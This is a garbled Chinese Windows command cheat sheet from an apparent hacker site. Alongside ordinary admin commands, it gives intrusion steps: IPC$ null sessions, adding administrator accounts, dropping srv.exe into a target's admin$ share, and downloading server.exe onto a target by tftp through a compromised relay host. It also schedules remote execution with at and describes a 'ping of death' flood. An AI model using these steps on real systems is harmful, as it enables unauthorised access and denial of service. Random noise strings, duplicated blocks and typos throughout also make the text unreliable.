本文汇总了常用的Windows命令,包括建立IPC连接、查看系统信息、管理用户和权限等实用操作,是IT人员必备的手册。
net use \\ip\ipc$ " " /user:" "
建立
IPC
空链接
vH-VA6[0net use \\ip\ipc$ "
密码
" /user:"
用户名
"
建立
IPC
非空链接
O;H R6it
w0net use h: \\ip\c$ " 密码 " /user:" 用户名 " 直接登陆后映射对方 C :到本地为 H:
C r;\/F f1SW[1]abl0net use h: \\ip\c$ 登陆后映射对方 C :到本地为 H: ★ 黑基空间 ★ 8D8hU(f$L9I4h] m Hk
net use \\ip\ipc$ /del 删除 IPC 链接 ★ 黑基空间 ★ "A8^-|m‑f:qw.[G8Y0Z
net use h: /del 删除映射对方到本地的为 H: 的映射
rt:GWw2qm6e]0net user 用户名 密码 /add 建立用户 ★ 黑基空间 ★ \Wj }ZCS
net user guest /active:yes 激活 guest 用户 ★ 黑基空间 ★ B"u Y;gm
net user 查看有哪些用户 ★ 黑基空间 ★ +J F,w |Ji-p
O;H R6it
w0net use h: \\ip\c$ " 密码 " /user:" 用户名 " 直接登陆后映射对方 C :到本地为 H:
C r;\/F f1SW[1]abl0net use h: \\ip\c$ 登陆后映射对方 C :到本地为 H: ★ 黑基空间 ★ 8D8hU(f$L9I4h] m Hk
net use \\ip\ipc$ /del 删除 IPC 链接 ★ 黑基空间 ★ "A8^-|m‑f:qw.[G8Y0Z
net use h: /del 删除映射对方到本地的为 H: 的映射
rt:GWw2qm6e]0net user 用户名 密码 /add 建立用户 ★ 黑基空间 ★ \Wj }ZCS
net user guest /active:yes 激活 guest 用户 ★ 黑基空间 ★ B"u Y;gm
net user 查看有哪些用户 ★ 黑基空间 ★ +J F,w |Ji-p
|%U@:m
net user 帐户名 查看帐户的属性 ★ 黑基空间 ★ +\` jky"I
net localgroup administrators 用户名 /add 把 “ 用户 ” 添加到管理员中使其具有管理员权限 , 注意: administrator 后加 s 用复数 ★ 黑基空间 ★ 4@ya.n)[8p|
net start 查看开启了哪些服务
V"l Q
net user 帐户名 查看帐户的属性 ★ 黑基空间 ★ +\` jky"I
net localgroup administrators 用户名 /add 把 “ 用户 ” 添加到管理员中使其具有管理员权限 , 注意: administrator 后加 s 用复数 ★ 黑基空间 ★ 4@ya.n)[8p|
net start 查看开启了哪些服务
V"l Q
e M"l0net start
服务名
开启服务;
(
如
:net start telnet
,
net start schedule)
★
黑基空间
★
FrN0lX6G F
net stop 服务名 停止某服务 ★ 黑基空间 ★ I
net stop 服务名 停止某服务 ★ 黑基空间 ★ I
H;L0a[
net time \\ 目标 ip 查看对方时间 ★ 黑基空间 ★ ,Lx
net time \\ 目标 ip 查看对方时间 ★ 黑基空间 ★ ,Lx
{(E#x
net time \\ 目标 ip /set 设置本地计算机时间与 “ 目标 IP” 主机的时间同步 , 加上参数 /yes 可取消确认信息
:F-f9u
net time \\ 目标 ip /set 设置本地计算机时间与 “ 目标 IP” 主机的时间同步 , 加上参数 /yes 可取消确认信息
:F-f9u
Y#r0net view
查看本地局域网内开启了哪些共享
★
黑基空间
★
P7\fhF^N5Z_
net view \\ip 查看对方局域网内开启了哪些共享
;`&KFn*p0net config 显示系统网络设置 ★ 黑基空间 ★ (B jBlBa+[8Z j
net logoff 断开连接的共享
+it4m2F!`0net pause 服务名 暂停某服务 ★ 黑基空间 ★ U,r{b&N*a
net send ip " 文本信息 " 向对方发信息 ★ 黑基空间 ★ |Po"s cYD
edit 打开某文件
)rJc
net view \\ip 查看对方局域网内开启了哪些共享
;`&KFn*p0net config 显示系统网络设置 ★ 黑基空间 ★ (B jBlBa+[8Z j
net logoff 断开连接的共享
+it4m2F!`0net pause 服务名 暂停某服务 ★ 黑基空间 ★ U,r{b&N*a
net send ip " 文本信息 " 向对方发信息 ★ 黑基空间 ★ |Po"s cYD
edit 打开某文件
)rJc
u3kJ0net ver
局域网内正在使用的网络连接类型和信息
8hD+nh9t7x7T5S&X0net share 查看本地开启的共享 ★ 黑基空间 ★ f)}3T:L:o ?(_[Gbo
net share ipc$ 开启 ipc$ 共享
2K
8hD+nh9t7x7T5S&X0net share 查看本地开启的共享 ★ 黑基空间 ★ f)}3T:L:o ?(_[Gbo
net share ipc$ 开启 ipc$ 共享
2K
~`5p k4BC0net share ipc$ /del
删除
ipc$
共享
★
黑基空间
★
#U5[s3z gb"K.M
net share c$ /del 删除 C :共享 ★ 黑基空间 ★ I c ?BSuR\
net user guest 12345 用 guest 用户登陆后用将密码改为 12345
*hD6zA)U
Z)H*]0net password 密码 更改系统登陆密码
&l;B,mK|M`.R7f:l
{0netstat -a 查看开启了哪些端口 , 常用 netstat -an ★ 黑基空间 ★ :\;F2P)I+P.J2y
netstat -n 查看端口的网络连接情况,常用 netstat -an
u)Le+D&I.|1]9h0netstat -v 查看正在进行的工作 ★ 黑基空间 ★ -i#x/V-yp e/w
netstat -p 协议名 例: netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
"e6A7D8jS`0netstat -s 查看正在使用的所有协议使用情况
`
NQR{4t
net share c$ /del 删除 C :共享 ★ 黑基空间 ★ I c ?BSuR\
net user guest 12345 用 guest 用户登陆后用将密码改为 12345
*hD6zA)U
Z)H*]0net password 密码 更改系统登陆密码
&l;B,mK|M`.R7f:l
{0netstat -a 查看开启了哪些端口 , 常用 netstat -an ★ 黑基空间 ★ :\;F2P)I+P.J2y
netstat -n 查看端口的网络连接情况,常用 netstat -an
u)Le+D&I.|1]9h0netstat -v 查看正在进行的工作 ★ 黑基空间 ★ -i#x/V-yp e/w
netstat -p 协议名 例: netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
"e6A7D8jS`0netstat -s 查看正在使用的所有协议使用情况
`
NQR{4t
D0nbtstat -A ip
对方
136
到
139
其中一个端口开了的话,就可查看对方最近登陆的用户名(
03
前的为用户名)
-
注意:参数
-A
要大写
★
黑基空间
★
nHu"Nr4I‑r*k2C
tracert - 参数 ip( 或计算机名 ) 跟踪路由(数据包),参数: “-w 数字 ” 用于设置超时间隔。
?B#^n&`;M C"xdO({0ping ip( 或域名 ) 向对方主机发送默认大小为 32 字节的数据,参数: “-l[ 空格 ] 数据包大小 ” ; “-n 发送数据次数 ” ; “-t” 指一直 ping 。
#gnp6k A] a0ping -t -l 65550 ip 死亡之 ping( 发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
%cG9y~/`k uj0ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98) 查看本地 ip 地址, ipconfig 可用参数 “/all” 显示全部配置信息
W _%dT!Vd? nD0tlist -t 以树行列表显示进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
G+L rjPP$J-M o'lM;d0kill -F 进程名 加 -F 参数后强制结束某进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 ) ★ 黑基空间 ★ 8U AO0U!dBe_
del -F 文件名 加 -F 参数后就可删除只读文件 ,/AR 、 /AH 、 /AS 、 /AA 分别表示删除只读、隐藏、系统、存档文件, /A-R 、 /A-H 、 /A-S 、 /A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如 “DEL/AR *.*” 表示删除当前目录下所有只读文件, “DEL/A-S *.*” 表示删除当前目录下除系统文件以外的所有文件 #2 二: del /S /Q 目录 或用: rmdir /s /Q 目录 /S 删除目录及目录下的所有子目录和文件。同时使用参数 /Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) ★ 黑基空间 ★ q;ax.B.v r l
move 盘符 \ 路径 \ 要移动的文件名 存放移动文件的路径 \ 移动后文件名 移动文件 , 用参数 /y 将取消确认移动目录存在相同文件的提示就直接覆盖 ★ 黑基空间 ★ M sO
tracert - 参数 ip( 或计算机名 ) 跟踪路由(数据包),参数: “-w 数字 ” 用于设置超时间隔。
?B#^n&`;M C"xdO({0ping ip( 或域名 ) 向对方主机发送默认大小为 32 字节的数据,参数: “-l[ 空格 ] 数据包大小 ” ; “-n 发送数据次数 ” ; “-t” 指一直 ping 。
#gnp6k A] a0ping -t -l 65550 ip 死亡之 ping( 发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
%cG9y~/`k uj0ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98) 查看本地 ip 地址, ipconfig 可用参数 “/all” 显示全部配置信息
W _%dT!Vd? nD0tlist -t 以树行列表显示进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
G+L rjPP$J-M o'lM;d0kill -F 进程名 加 -F 参数后强制结束某进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 ) ★ 黑基空间 ★ 8U AO0U!dBe_
del -F 文件名 加 -F 参数后就可删除只读文件 ,/AR 、 /AH 、 /AS 、 /AA 分别表示删除只读、隐藏、系统、存档文件, /A-R 、 /A-H 、 /A-S 、 /A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如 “DEL/AR *.*” 表示删除当前目录下所有只读文件, “DEL/A-S *.*” 表示删除当前目录下除系统文件以外的所有文件 #2 二: del /S /Q 目录 或用: rmdir /s /Q 目录 /S 删除目录及目录下的所有子目录和文件。同时使用参数 /Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) ★ 黑基空间 ★ q;ax.B.v r l
move 盘符 \ 路径 \ 要移动的文件名 存放移动文件的路径 \ 移动后文件名 移动文件 , 用参数 /y 将取消确认移动目录存在相同文件的提示就直接覆盖 ★ 黑基空间 ★ M sO
C$\%opU
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中, "> " 和 "> >" 是重定向命令
4f9N6i7@ QS2}3d0at id 号 开启已注册的某个计划任务
B%eRB y1lU p*v0at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止 ★ 黑基空间 ★ *X.B
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中, "> " 和 "> >" 是重定向命令
4f9N6i7@ QS2}3d0at id 号 开启已注册的某个计划任务
B%eRB y1lU p*v0at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止 ★ 黑基空间 ★ *X.B
I["\x
Y
at id 号 /delete 停止某个已注册的计划任务
%c }6@)m%wRb0at 查看所有的计划任务 ★ 黑基空间 ★ ,C T{&~t
at \\ip time 程序名 ( 或一个命令 ) /r 在某时间运行对方某程序并重新启动计算机 ★ 黑基空间 ★ v/iv V/WIr{(Y
finger username @host 查看最近有哪些用户登陆
7i#B}e#v GD0telnet ip 端口 远和登陆服务器 , 默认端口为 23 ★ 黑基空间 ★ ;`
at id 号 /delete 停止某个已注册的计划任务
%c }6@)m%wRb0at 查看所有的计划任务 ★ 黑基空间 ★ ,C T{&~t
at \\ip time 程序名 ( 或一个命令 ) /r 在某时间运行对方某程序并重新启动计算机 ★ 黑基空间 ★ v/iv V/WIr{(Y
finger username @host 查看最近有哪些用户登陆
7i#B}e#v GD0telnet ip 端口 远和登陆服务器 , 默认端口为 23 ★ 黑基空间 ★ ;`
JR)S9E
open ip 连接到 IP (属 telnet 登陆后的命令)
Ll8Q"Z H0M.h _"n z b"C0telnet 在本机上直接键入 telnet 将进入本机的 telnet
kk&Rk] @Y4j+G0copy 路径 \ 文件名 1 路径 \ 文件名 2 /y 复制文件 1 到指定的目录为文件 2 ,用参数 /y 就同时取消确认你要改写一份现存目录文件
V.cq(jj!@#J&Nl-i3aT C0copy c:\srv.exe \\ip\admin$ 复制本地 c:\srv.exe 到对方的 admin 下 ★ 黑基空间 ★ bZx#Q7w
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注: 2st.txt 文件头要空三排,参数: /b 指二进制文件, /a 指 ASCLL 格式文件 ★ 黑基空间 ★ U \^ bH5K
copy \\ip\admin$\svv.exe c:\ 或 :copy\\ip\admin$\*.* 复制对方 admini$ 共享下的 srv.exe 文件(所有文件)至本地 C :
7e5Y(MIo@0xcopy 要复制的文件或目录树 目标地址 \ 目录名 复制文件和目录树,用参数 /Y 将不提示覆盖相同文件 ★ 黑基空间 ★ 5Y{3o#f)sG'MB O
tftp -i 自己 IP( 用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将 “IP” 的 server.exe 下载到目标主机 c:\server.exe 参数: -i 指以二进制模式传送,如传送 exe 文件时用,如不加 -i 则以 ASCII 模式(传送文本文件模式)进行传送
P
OP P
open ip 连接到 IP (属 telnet 登陆后的命令)
Ll8Q"Z H0M.h _"n z b"C0telnet 在本机上直接键入 telnet 将进入本机的 telnet
kk&Rk] @Y4j+G0copy 路径 \ 文件名 1 路径 \ 文件名 2 /y 复制文件 1 到指定的目录为文件 2 ,用参数 /y 就同时取消确认你要改写一份现存目录文件
V.cq(jj!@#J&Nl-i3aT C0copy c:\srv.exe \\ip\admin$ 复制本地 c:\srv.exe 到对方的 admin 下 ★ 黑基空间 ★ bZx#Q7w
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注: 2st.txt 文件头要空三排,参数: /b 指二进制文件, /a 指 ASCLL 格式文件 ★ 黑基空间 ★ U \^ bH5K
copy \\ip\admin$\svv.exe c:\ 或 :copy\\ip\admin$\*.* 复制对方 admini$ 共享下的 srv.exe 文件(所有文件)至本地 C :
7e5Y(MIo@0xcopy 要复制的文件或目录树 目标地址 \ 目录名 复制文件和目录树,用参数 /Y 将不提示覆盖相同文件 ★ 黑基空间 ★ 5Y{3o#f)sG'MB O
tftp -i 自己 IP( 用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将 “IP” 的 server.exe 下载到目标主机 c:\server.exe 参数: -i 指以二进制模式传送,如传送 exe 文件时用,如不加 -i 则以 ASCII 模式(传送文本文件模式)进行传送
P
OP P
vX'tJa~4T0tftp -i
对方
IP
put c:\server.exe
登陆后,上传本地
c:\server.exe
至主机
Ws"Z
Ws"Z
_P$I o0ftp ip
端口
用于上传文件至服务器或进行文件操作,默认端口为
21
。
bin
指用二进制方式传送(可执行文件进);默认为
ASCII
格式传送
(
文本文件时
)
$rNg'o6Y/t+H0route print 显示出 IP 路由,将主要显示网络地址 Network addres ,子网掩码 Netmask ,网关地址 Gateway addres ,接口地址 Interface ★ 黑基空间 ★ +v/?AB+Ng
arp 查看和处理 ARP 缓存, ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的 MAC 地址。 arp -a 将显示出全部信息 ★ 黑基空间 ★ GO*Wfr5SJ_
start 程序名或命令 /max 或 /min 新开一个新窗口并最大化(最小化)运行某程序或命令
:C$~[1]k0owb9~Ry/E1Z0mem 查看 cpu 使用情况 ★ 黑基空间 ★ k;?Z(}
$rNg'o6Y/t+H0route print 显示出 IP 路由,将主要显示网络地址 Network addres ,子网掩码 Netmask ,网关地址 Gateway addres ,接口地址 Interface ★ 黑基空间 ★ +v/?AB+Ng
arp 查看和处理 ARP 缓存, ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的 MAC 地址。 arp -a 将显示出全部信息 ★ 黑基空间 ★ GO*Wfr5SJ_
start 程序名或命令 /max 或 /min 新开一个新窗口并最大化(最小化)运行某程序或命令
:C$~[1]k0owb9~Ry/E1Z0mem 查看 cpu 使用情况 ★ 黑基空间 ★ k;?Z(}
y~W
attrib 文件名 ( 目录名 ) 查看某文件(目录)的属性
{5B&G7T.l+H x1yc0attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉 ( 添加 ) 某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
l;h)F-AQ gy0dir 查看文件,参数: /Q 显示文件及目录属系统哪个用户, /T:C 显示文件创建时间, /T:A 显示文件上次被访问时间, /T:W 上次被修改时间
d0Kc
_d a C0date /t 、 time /t 使用此参数即 “DATE/T” 、 “TIME/T” 将只显示当前日期和时间,而不必输入新日期和时间 ★ 黑基空间 ★ 2^1} \;V@%I
set 指定环境变量名称 = 要指派给变量的字符 设置环境变量 ★ 黑基空间 ★ N7E|b!ea%b
set 显示当前所有的环境变量 ★ 黑基空间 ★ ^
attrib 文件名 ( 目录名 ) 查看某文件(目录)的属性
{5B&G7T.l+H x1yc0attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉 ( 添加 ) 某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
l;h)F-AQ gy0dir 查看文件,参数: /Q 显示文件及目录属系统哪个用户, /T:C 显示文件创建时间, /T:A 显示文件上次被访问时间, /T:W 上次被修改时间
d0Kc
_d a C0date /t 、 time /t 使用此参数即 “DATE/T” 、 “TIME/T” 将只显示当前日期和时间,而不必输入新日期和时间 ★ 黑基空间 ★ 2^1} \;V@%I
set 指定环境变量名称 = 要指派给变量的字符 设置环境变量 ★ 黑基空间 ★ N7E|b!ea%b
set 显示当前所有的环境变量 ★ 黑基空间 ★ ^
`O.b X%u3? K:Sv
set p( 或其它字符 ) 显示出当前以字符 p( 或其它字符 ) 开头的所有环境变量 ★ 黑基空间 ★ r&W‑reKNv m
pause 暂停批处理程序,并显示出:请按任意键继续 ....
set p( 或其它字符 ) 显示出当前以字符 p( 或其它字符 ) 开头的所有环境变量 ★ 黑基空间 ★ r&W‑reKNv m
pause 暂停批处理程序,并显示出:请按任意键继续 ....
R$i
D9X%F5V0if
在批处理程序中执行条件处理(更多说明见
if
命令及变量)
★
黑基空间
★
3c9u5qT
j
goto 标签 将 cmd.exe 导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如: “ : start” 标签) ★ 黑基空间 ★ 3i w,U-C"R,g.D
call 路径 \ 批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见 call /? )
Q h;n y ne0for 对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
%o
f3D1}9]i @@Z+_0echo on 或 off 打开或关闭 echo ,仅用 echo 不加参数则显示当前 echo 设置 ★ 黑基空间 ★ Q5^Z(lS
goto 标签 将 cmd.exe 导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如: “ : start” 标签) ★ 黑基空间 ★ 3i w,U-C"R,g.D
call 路径 \ 批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见 call /? )
Q h;n y ne0for 对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
%o
f3D1}9]i @@Z+_0echo on 或 off 打开或关闭 echo ,仅用 echo 不加参数则显示当前 echo 设置 ★ 黑基空间 ★ Q5^Z(lS
l9W-b
echo 信息 在屏幕上显示出信息
[n_.@O-Fb5Y0echo 信息 >> pass.txt 将 " 信息 " 保存到 pass.txt 文件中
5?~;L O7b5?_2d0findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello
F.EWj
echo 信息 在屏幕上显示出信息
[n_.@O-Fb5Y0echo 信息 >> pass.txt 将 " 信息 " 保存到 pass.txt 文件中
5?~;L O7b5?_2d0findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello
F.EWj
~ qY0find
文件名
查找某文件
★
黑基空间
★
JW
L8n‑x
title 标题名字 更改 CMD 窗口标题名字
.N
LaBq0dp&A N0color 颜色值 设置 cmd 控制台前景和背景颜色; 0 =黑、 1 =蓝、 2 =绿、 3 =浅绿、 4 =红、 5 =紫、 6 =黄、 7= 白、 8= 灰、 9= 淡蓝、 A =淡绿、 B= 淡浅绿、 C= 淡红、 D= 淡紫、 E= 淡黄、 F= 亮白
GX1r7VOq
L8n‑x
title 标题名字 更改 CMD 窗口标题名字
.N
LaBq0dp&A N0color 颜色值 设置 cmd 控制台前景和背景颜色; 0 =黑、 1 =蓝、 2 =绿、 3 =浅绿、 4 =红、 5 =紫、 6 =黄、 7= 白、 8= 灰、 9= 淡蓝、 A =淡绿、 B= 淡浅绿、 C= 淡红、 D= 淡紫、 E= 淡黄、 F= 亮白
GX1r7VOq
D HW ^0prompt
名称
更改
cmd.exe
的显示的命令提示符
(
把
C:\
、
D:\
统一改为:
EntSky\ )#3
三:
ver
在
DOS
窗口下显示版本信息
★
黑基空间
★
3d%M h$}
g!q8Lk]
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) ★ 黑基空间 ★ a!g9n5@UhVh
format 盘符 /FS: 类型 格式化磁盘 , 类型 :FAT 、 FAT32 、 NTFS , 例: Format D: /FS:NTFS ★ 黑基空间 ★ Ng9y9z1E/k6[y
md 目录名 创建目录 ★ 黑基空间 ★ 0F vP3[5M:y&n"|
replace 源文件 要替换文件的目录 替换文件 ★ 黑基空间 ★ 9v‑T1u2\,\d;hxX0@
ren 原文件名 新文件名 重命名文件名
7E#j0{c7tg,L0tree 以树形结构显示出目录,用参数 -f 将列出第个文件夹中文件名称
x%@0y
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) ★ 黑基空间 ★ a!g9n5@UhVh
format 盘符 /FS: 类型 格式化磁盘 , 类型 :FAT 、 FAT32 、 NTFS , 例: Format D: /FS:NTFS ★ 黑基空间 ★ Ng9y9z1E/k6[y
md 目录名 创建目录 ★ 黑基空间 ★ 0F vP3[5M:y&n"|
replace 源文件 要替换文件的目录 替换文件 ★ 黑基空间 ★ 9v‑T1u2\,\d;hxX0@
ren 原文件名 新文件名 重命名文件名
7E#j0{c7tg,L0tree 以树形结构显示出目录,用参数 -f 将列出第个文件夹中文件名称
x%@0y
Q-c#Z0type
文件名
显示文本文件的内容
★
黑基空间
★
;hCg,`%R;l[.dK
more 文件名 逐屏显示输出文件
sM
more 文件名 逐屏显示输出文件
sM
x7T
r b,`g5x2]%J0doskey 要锁定的命令=字符
3KIY5SZ;?%a9@$l#\
B0doskey 要解锁命令 = 为 DOS 提供的锁定命令 ( 编辑命令行,重新调用 win2k 命令,并创建宏 ) 。如:锁定 dir 命令: doskey dir=entsky ( 不能用 doskey dir=dir) ;解锁: doskey dir=
u0k6[3jyr;y
r b,`g5x2]%J0doskey 要锁定的命令=字符
3KIY5SZ;?%a9@$l#\
B0doskey 要解锁命令 = 为 DOS 提供的锁定命令 ( 编辑命令行,重新调用 win2k 命令,并创建宏 ) 。如:锁定 dir 命令: doskey dir=entsky ( 不能用 doskey dir=dir) ;解锁: doskey dir=
u0k6[3jyr;y
t7|0taskmgr
调出任务管理器
★
黑基空间
★
3lW fh(f
b0Dh
chkdsk /F D: 检查磁盘 D 并显示状态报告;加参数 /f 并修复磁盘上的错误 ★ 黑基空间 ★ T1D.ll*MUV1}X
tlntadmn telnt 服务 admn, 键入 tlntadmn 选择 3 ,再选择 8, 就可以更改 telnet 服务默认端口 23 为其它任何端口 ★ 黑基空间 ★ +s*d2bX$e Dog
exit 退出 cmd.exe 程序或目前,用参数 /B 则是退出当前批处理脚本而不是 cmd.exe ★ 黑基空间 ★ "E h*? h]G#x
path 路径 \ 可执行文件的文件名 为可执行文件设置一个路径。 ★ 黑基空间 ★ 6r mHH
u v!TKO*e?‑LtP
cmd 启动一个 win2K 命令解释窗口。参数: /eff 、 /en 关闭、开启命令扩展;更我详细说明见 cmd /?
8N2x J? |&T[1]m‑T5H0regedit /s 注册表文件名 导入注册表;参数 /S 指安静模式导入,无任何提示;
%~‑~,S7I+aKiF0regedit /e 注册表文件名 导出注册表 ★ 黑基空间 ★ %F8J"h tl`
cacls 文件名 参数 显示或修改文件访问控制列表( ACL ) -- 针对 NTFS 格式时。参数: /D 用户名 : 设定拒绝某用户访问; /P 用户名 :perm 替换指定用户的访问权限; /G 用户名 :perm 赋予指定用户访问权限; Perm 可以是 : N 无, R 读取, W 写入, C 更改 ( 写入 ) , F 完全控制;例: cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。 ★ 黑基空间 ★ /V9F s/k5z+f
cacls 文件名 查看文件的访问用户权限列表
H"G G:I_Q}%y2m H6Z0 ★ 黑基空间 ★ ‑k@*Mj:R9i[1]p8_(D
$d‑|/q/bid0============================================================
w3{o
chkdsk /F D: 检查磁盘 D 并显示状态报告;加参数 /f 并修复磁盘上的错误 ★ 黑基空间 ★ T1D.ll*MUV1}X
tlntadmn telnt 服务 admn, 键入 tlntadmn 选择 3 ,再选择 8, 就可以更改 telnet 服务默认端口 23 为其它任何端口 ★ 黑基空间 ★ +s*d2bX$e Dog
exit 退出 cmd.exe 程序或目前,用参数 /B 则是退出当前批处理脚本而不是 cmd.exe ★ 黑基空间 ★ "E h*? h]G#x
path 路径 \ 可执行文件的文件名 为可执行文件设置一个路径。 ★ 黑基空间 ★ 6r mHH
u v!TKO*e?‑LtP
cmd 启动一个 win2K 命令解释窗口。参数: /eff 、 /en 关闭、开启命令扩展;更我详细说明见 cmd /?
8N2x J? |&T[1]m‑T5H0regedit /s 注册表文件名 导入注册表;参数 /S 指安静模式导入,无任何提示;
%~‑~,S7I+aKiF0regedit /e 注册表文件名 导出注册表 ★ 黑基空间 ★ %F8J"h tl`
cacls 文件名 参数 显示或修改文件访问控制列表( ACL ) -- 针对 NTFS 格式时。参数: /D 用户名 : 设定拒绝某用户访问; /P 用户名 :perm 替换指定用户的访问权限; /G 用户名 :perm 赋予指定用户访问权限; Perm 可以是 : N 无, R 读取, W 写入, C 更改 ( 写入 ) , F 完全控制;例: cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。 ★ 黑基空间 ★ /V9F s/k5z+f
cacls 文件名 查看文件的访问用户权限列表
H"G G:I_Q}%y2m H6Z0 ★ 黑基空间 ★ ‑k@*Mj:R9i[1]p8_(D
$d‑|/q/bid0============================================================
w3{o
R H o0at
命令与
copy
命令
G#Rr;x/Xr0 ★ 黑基空间 ★ ;c{wnf'R2u)S
at 命令 ★ 黑基空间 ★ _+o[1]QM2qT7q"S"b
?)~Qb5_0at 21:00 ShutDown -S -T30( 到了 21:00 点 , 电脑会出现 “ 系统关机 ” 对话框 , 并默认 30 秒延时自动关机。 ) ★ 黑基空间 ★ &T2Fz4H#A5E`
G#Rr;x/Xr0 ★ 黑基空间 ★ ;c{wnf'R2u)S
at 命令 ★ 黑基空间 ★ _+o[1]QM2qT7q"S"b
?)~Qb5_0at 21:00 ShutDown -S -T30( 到了 21:00 点 , 电脑会出现 “ 系统关机 ” 对话框 , 并默认 30 秒延时自动关机。 ) ★ 黑基空间 ★ &T2Fz4H#A5E`
Ny[2f1^1} f
i}.xp\ y0shutdown -a
取消
60
秒关机
★
黑基空间
★
8DTm@.vMh.j2D5e
★ 黑基空间 ★ ^i%P3kh'qA/H#X
(Viliosn.exe 是一个程序 )
!{8q/]Z
C o01, 如果想让启动对方在指定时间里的某个程序 , 你可在命令行里打入 : ★ 黑基空间 ★ +r
V
★ 黑基空间 ★ ^i%P3kh'qA/H#X
(Viliosn.exe 是一个程序 )
!{8q/]Z
C o01, 如果想让启动对方在指定时间里的某个程序 , 你可在命令行里打入 : ★ 黑基空间 ★ +r
V
{+nQ.M:^%j)K
At \\127.0.0.123:00 c:\winnt\system32/viliosn.exe
J$R4t? ?0 提示 : 新加了一份作业 , 作业 id=1 ★ 黑基空间 ★ #l6n!nz ?`5O
2. 让对方的计算机在每周一和周二的 23:00 启动某个程序 . 那么你可以打入 ★ 黑基空间 ★ -fEs#gGQl
At \\127.0.0.1 23:00 /every: 一 , 二 c:\winnt\system32\viliosn.exe
.g[1]S?8e‑FS)@0 提示 : 新加了一份作业 , 作业 id=2
"~!E$|9g@.Iki0
p(q9dh2i2a03. 删除对方计算机上作业 id 为 1 的任务
z
v!k,_%C0At \\127.0.0.1 1 /delete /yes
5Ab(v6M,M2F04. 删除所有的任务
+q['P]bf0At \\127.0.0.1 /delete
"s)e l‑J&V5z(} x.Y4x0 提示 : 是否要删除所有的操作 ? 然后我们打 Y ★ 黑基空间 ★ 8R~%\-u S
U Y
(O;]!rG*G(e0============================================================================================ ★ 黑基空间 ★ n)VG{3`$r7s:nh
★ 黑基空间 ★ f3o n6q E)rj$C,B
At \\127.0.0.123:00 c:\winnt\system32/viliosn.exe
J$R4t? ?0 提示 : 新加了一份作业 , 作业 id=1 ★ 黑基空间 ★ #l6n!nz ?`5O
2. 让对方的计算机在每周一和周二的 23:00 启动某个程序 . 那么你可以打入 ★ 黑基空间 ★ -fEs#gGQl
At \\127.0.0.1 23:00 /every: 一 , 二 c:\winnt\system32\viliosn.exe
.g[1]S?8e‑FS)@0 提示 : 新加了一份作业 , 作业 id=2
"~!E$|9g@.Iki0
p(q9dh2i2a03. 删除对方计算机上作业 id 为 1 的任务
z
v!k,_%C0At \\127.0.0.1 1 /delete /yes
5Ab(v6M,M2F04. 删除所有的任务
+q['P]bf0At \\127.0.0.1 /delete
"s)e l‑J&V5z(} x.Y4x0 提示 : 是否要删除所有的操作 ? 然后我们打 Y ★ 黑基空间 ★ 8R~%\-u S
U Y
(O;]!rG*G(e0============================================================================================ ★ 黑基空间 ★ n)VG{3`$r7s:nh
★ 黑基空间 ★ f3o n6q E)rj$C,B
TE}Q1t0
映射命令
:net use z: \\192.168.1.55\c$ "" /user:"administrator"
★
黑基空间
★
,So6IIRGQ)Zu%N
★ 黑基空间 ★ D
★ 黑基空间 ★ D
BD G,cv;\d%\ s7O9m
建立 IPC 连接 :net use \\192.168.1.55\ipc$ /user:"administrator"
0_Q:}'X om"h0
\B'T0H v:An0 查看远程进程 :tasklist /s 127.0.0.0 /u user ★ 黑基空间 ★ [1]q.Z,oZ[&[2MY
★ 黑基空间 ★ qha-R ~|,{
结束某个进程 :taskkill /pid XXXX
v:G
建立 IPC 连接 :net use \\192.168.1.55\ipc$ /user:"administrator"
0_Q:}'X om"h0
\B'T0H v:An0 查看远程进程 :tasklist /s 127.0.0.0 /u user ★ 黑基空间 ★ [1]q.Z,oZ[&[2MY
★ 黑基空间 ★ qha-R ~|,{
结束某个进程 :taskkill /pid XXXX
v:G
W#B_4C0
★
黑基空间
★
&b:r:F)P%X8r3f
============================================================================================
